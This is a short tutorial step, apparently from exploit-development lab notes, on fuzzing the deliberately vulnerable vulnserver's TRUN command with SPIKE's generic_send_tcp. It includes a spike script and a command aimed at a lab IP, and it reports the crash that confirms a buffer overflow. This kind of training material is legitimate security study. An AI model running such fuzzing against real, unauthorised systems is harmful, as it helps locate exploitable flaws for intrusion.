Step 0: Spiking (Optional)

generic_send_tcp

Note that vulnserver has many commands available:

In order to figure out which commands are vulnerable, we use generic_send_tcp to "spike" the executable and look for crashes:

generic_send_tcp <ip> <port> <spike_script> <SKIPVAR=0> <SKIPSTR=0>

Suppose we want to spike the TRUN command, then the spike script is:

trun.spk

s_readline();
s_string("TRUN ");
s_string_variable("0");

Run vulnserver by pressing F9 in Immunity Debugger. From our Linux attack machine, spike it:

generic_send_tcp 192.168.1.2 9999 trun.spk 0 0

Immidiately, the executable crashed. We can confirm that the TRUN command has BoF vulnerability:

Last updated 4 years ago